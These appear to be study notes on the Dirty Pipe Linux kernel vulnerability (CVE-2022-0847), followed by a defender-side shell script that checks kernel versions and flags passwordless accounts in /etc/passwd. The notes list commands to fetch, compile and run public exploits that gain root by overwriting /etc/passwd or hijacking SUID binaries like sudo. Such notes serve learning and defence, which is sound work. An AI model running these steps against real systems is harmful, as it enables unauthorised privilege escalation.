Dirty Pipe

  • vulnerability in the Linux kernel, named Dirty Pipe (CVE-2022-0847),
    • allows a user to write to arbitrary files as long as they have read access to those files.
    • on Android phones, apps run with user rights, so a malicious or compromised app could take over the phone.
    • similar to the Dirty Cow vulnerability discovered in 2016.
  • All kernels from version 5.8 to 5.17 are affected by this vulnerability.
  • uses kernel pipes (the pipe()/splice() mechanism, not the shell | operator) for exploitation
  • we can edit the /etc/passwd file to remove the password and log in without a password as any user
  • PoC - https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
    • git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
    • cd CVE-2022-0847-DirtyPipe-Exploits
    • bash compile.sh
    • will create 2 files - exploit-1 and exploit-2

For exploit-1

  • modifies the /etc/passwd and gives us a prompt with root privileges
  • verify kernel version
    • uname -r
  • exploit
    • ./exploit-1

For exploit-2

  • we can execute SUID binaries with root privs
  • find SUID binaries
    • find / -perm -4000 2>/dev/null
  • choose some binary with the full path
    • ./exploit-2 /usr/bin/sudo
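A defender-side check to go with these notes, added here as an example (it is not part of the notes or of the linked PoC repository). The first function classifies a `uname -r` string against the affected range given above (5.8 to 5.17), using the upstream stable releases that carry the fix (5.16.11, 5.15.25 and 5.10.102) as cut-offs; the second lists accounts in a passwd-format file whose password field is empty, which is the state exploit-1 leaves in /etc/passwd. The function names and the constructed sample passwd lines are my own.

```shell
#!/bin/sh
# Added example (not from the original notes): host checks for Dirty Pipe (CVE-2022-0847).
# Assumptions: affected window 5.8 <= v < 5.17 as stated in the notes; upstream fixed
# point releases 5.16.11, 5.15.25 and 5.10.102 used as cut-offs. Distributions often
# backport the fix without changing the version string, so "vulnerable" here means
# "confirm against the vendor advisory", not proof of exposure.

# vuln_kernel VERSION -> prints "vulnerable" or "ok"
# VERSION is a uname -r style string such as "5.10.100-generic".
vuln_kernel() {
    # keep only the leading dotted numeric part: "5.16.11-arch1-1" -> "5.16.11"
    v=$(printf '%s' "$1" | sed 's/[^0-9.].*$//')
    # split on "." into positional parameters; missing parts default to 0
    set -- $(printf '%s\n' "$v" | tr '.' ' ')
    maj=${1:-0}; min=${2:-0}; pat=${3:-0}

    # entirely outside the 5.8 .. 5.16.x window (older 5.x, 4.x, 6.x, 5.17+)
    if [ "$maj" -ne 5 ] || [ "$min" -lt 8 ] || [ "$min" -ge 17 ]; then
        echo ok
        return 0
    fi
    # stable branches that received the upstream fix; other 5.x branches in the
    # window were end-of-life upstream and only fixed by vendor backports
    case "$min" in
        16) fixed=11 ;;
        15) fixed=25 ;;
        10) fixed=102 ;;
        *)  fixed= ;;
    esac
    if [ -n "$fixed" ] && [ "$pat" -ge "$fixed" ]; then
        echo ok
    else
        echo vulnerable
    fi
}

# passwd_empty_fields FILE -> prints each account in a passwd-format FILE whose
# password field (field 2) is empty, i.e. a login that needs no password.
passwd_empty_fields() {
    awk -F: 'NF >= 7 && $2 == "" { print $1 }' "$1"
}

# Run against the live host when executed directly.
echo "kernel $(uname -r): $(vuln_kernel "$(uname -r)")"
if [ -r /etc/passwd ]; then
    passwd_empty_fields /etc/passwd | while read -r u; do
        echo "WARNING: account '$u' has an empty password field in /etc/passwd"
    done
fi
```

The version check is only a first pass: a warning from it should be followed by a look at the distribution's advisory for the running kernel package, since vendor kernels carry the fix under unchanged version numbers. The passwd check is cheap enough to run from a periodic integrity job; any hit on a host that is not meant to have passwordless accounts is worth treating as a possible file-overwrite incident.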